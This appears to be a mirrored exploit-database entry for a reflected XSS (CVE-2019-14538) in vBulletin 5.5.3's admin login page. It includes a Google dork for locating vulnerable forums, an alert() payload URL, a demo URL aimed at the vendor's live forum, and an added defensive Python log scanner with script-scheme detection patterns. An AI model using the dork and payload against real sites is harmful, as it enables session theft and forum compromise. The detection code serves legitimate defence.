
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080131

Below is a copy:

vBulletin Reflected XSS via "Click here"
# Exploit Title: vBulletin Reflected XSS via "Click here" 
# Google Dork: intext : "Powered by vBulletin Version 5.5.3 Copyright  2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR / AKNCLAR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538


#################################################################################

Dork: intext : "Powered by vBulletin Version 5.5.3 Copyright  2019 MH Sub I, LLC dba vBulletin"

vBulletin 5.5.3 Reflected XSS via "Click here" 

Payload: 

/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

The injected value is rendered as the href of the "Click here" link in the login error message; clicking that link executes the javascript: URL (reflected XSS).
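Added example (not part of the advisory, not vBulletin code): a defender-side check for the request shape above. It scans constructed Apache-style access-log lines for `admincp/index.php` requests whose `loginerror_arr[...]` values carry a script scheme after URL-decoding and control-character stripping, and shows the allow-list an href built from request data should pass instead. The log lines, IPs and function names are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not from the advisory). The first two carry
# the query shape of the published payload, the third is a benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Aug/2019:10:01:02 +0000] "GET /admincp/index.php?'
    'loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]='
    'javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Aug/2019:10:02:15 +0000] "GET /admincp/index.php?'
    'loginerror_arr%5B1%5D=%20JaVa%09ScRiPt%3Aalert%281%29 HTTP/1.1" 200 5100',
    '198.51.100.7 - - [25/Aug/2019:10:03:40 +0000] "GET /admincp/index.php?'
    'loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]='
    '/admincp/index.php HTTP/1.1" 200 5100',
]

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")

def normalize(value: str) -> str:
    """Decode, lowercase and drop the control/whitespace chars browsers ignore in a scheme."""
    return re.sub(r"[\x00-\x20]", "", unquote(value).lower())

def has_script_scheme(value: str) -> bool:
    """Detection-side test: does the value resolve to a script-executing URL scheme?"""
    return normalize(value).startswith(SCRIPT_SCHEMES)

def href_is_safe(value: str) -> bool:
    """Mitigation-side allow-list: only site-relative paths or http(s) URLs may be linked."""
    v = normalize(value)
    return (v.startswith("/") and not v.startswith("//")) or v.startswith(("http://", "https://"))

def find_loginerror_xss(lines):
    """Return (line_no, param, decoded_value) for loginerror_arr values with a script scheme."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m or not urlsplit(m.group(1)).path.endswith("/admincp/index.php"):
            continue
        for param, values in parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True).items():
            if param.startswith("loginerror_arr"):
                hits.extend((n, param, v) for v in values if has_script_scheme(v))
    return hits

if __name__ == "__main__":
    for hit in find_loginerror_xss(SAMPLE_LOG):
        print("possible CVE-2019-14538 probe:", hit)
```

The second sample line shows why decoding and control-character stripping happen before the scheme check: a naive substring match on `javascript:` misses the obfuscated form but the browser still executes it.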

Demo : 

https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin


screenshot: https://imguploads.net/images/2019/08/25/vbulletin-xss-trazer.png

#################################################################################
